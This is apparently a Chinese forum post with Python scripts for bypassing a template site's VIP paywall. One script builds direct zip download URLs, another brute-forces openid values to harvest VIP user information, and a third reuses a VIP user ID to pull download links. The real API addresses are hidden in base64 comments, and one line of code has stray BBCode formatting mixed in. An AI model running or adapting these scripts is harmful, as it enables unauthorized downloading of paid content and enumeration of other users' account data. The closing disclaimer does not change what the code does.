解析全站VIP zip 包地址
def down_url(id):
# 构造 http://down.主域名.com:8020/cssthemes6/skk-0610-19.zip 的地址即可下载
url = f"{BaseURL}/cssthemes/{id}.shtml"
resp = requests.get(url, headers)
html = etree.HTML(resp.text)
a = html.xpath('//*[@id="main"]/div[1]/div[2]/div[1]/div[3]/div[1]/div[2]/div[4]/a[1]/@data-url')[0]
data_url = a.split("/")[-2]
d_url = f"http://down.主域名.com:8020/cssthemes6/{data_url}.zip" # 修改处
s = '%s,%s\n' % (id, d_url)
print(s) # 控制台输出url
def one_page(id):
url = f"{BaseURL}/cssthemes/index_{id}.shtml"
resp = requests.get(url, headers)
html = etree.HTML(resp.text)
a = html.xpath('//*[@id="main"]/div[1]/div/article/div/ul/li/a/@href')
for i in a:
d_url = i.split("/")[-1].split(".")[0]
down_url(d_url)
if __name__ == '__main__':
for i in range(1, 689):
one_page(i)2022-11-30 更新用户取 vip id程序
def userinfo(id):
"""
取openid
:return:
"""
url = 'http://vip.xxx.com/apishenji/userinfo' # aHR0cDovL3ZpcC5jc3Ntb2Jhbi5jb20vYXBpc2hlbmppL3VzZXJpbmZv
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0",
"Referer": "http://www.xxx.com/" # 替换成地址
}
data = {
"openid": id,
"phone": "",
"id": id,
}
try:
resp = requests.post(url=url, headers=headers, data=data).json()['myvip']
print(resp)
except:
pass
if __name__ == '__main__':
# for id in range(102898, 747312):
for id in range(2022113000000000000, 2022113008175495000): # 年月日时分秒毫微.....[color=rgb(169, 183, 198)][backcolor=rgb(43, 43, 43)][font="][size=9.8pt]datetime.datetime.now().strftime([/size][/font][/backcolor][/color][color=rgb(106, 135, 89)][font="][size=9.8pt]'%Y%m%d%H%M%S%f'[/size][/font][/color][color=rgb(169, 183, 198)][backcolor=rgb(43, 43, 43)][font="][size=9.8pt])[/size][/font][/backcolor][/color]
# 取用户信息
userinfo(id)ID:
import requests
from lxml import etree
BaseURL = 'http://www.xxxxxx.com' #自己改一下
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0",
"Referer": BaseURL
}
def save_data(s):
with open("模板下载地址.csv", mode="a", encoding="utf-8") as f:
f.write(s)
def download_url(li):
url = 'http://vip.xxxxx.com/apishenji/down' # J2h0dHA6Ly92aXAuY3NzbW9iYW4uY29tL2FwaXNoZW5qaS9kb3duJw==
data = {
"userid": "100000", # VIP id {"code":-4,"msg":"下载次数限制"} 根据code 替换id ,自己脑补
"mobanid": li,
"screkey": "undefined",
}
resp = requests.post(url=url, headers=headers, data=data)
resp = resp.json()['data']
if resp != "":
s = '%s,%s\n' % (li, resp)
save_data(s)
else:
print(li)
def one_page(id):
url = f"{BaseURL}/cssthemes/index_{id}.shtml"
resp = requests.get(url, headers)
html = etree.HTML(resp.text)
a = html.xpath('//*[@id="main"]/div[1]/div/article/div/ul/li/a/@href')
for i in a:
d_url = i.split("/")[-1].split(".")[0]
download_url(27766)
if __name__ == '__main__':
for i in range(1, 689):
one_page(i)只是测试了一下,不要干坏事,不要干坏事,不要干坏事!
VIP账号每天也是有下载次数的限制的!有用的加个热心吧!

